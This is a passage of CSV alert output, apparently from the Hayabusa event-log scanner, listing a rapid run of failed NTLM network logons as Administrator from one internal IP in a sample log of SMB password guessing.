Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.223 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.323 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.405 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.877 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.925 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:22.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.107 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:23.143 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.283 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.415 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.450 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.810 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.962 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.203 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.410 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.886 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.040 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:25.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.593 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: 
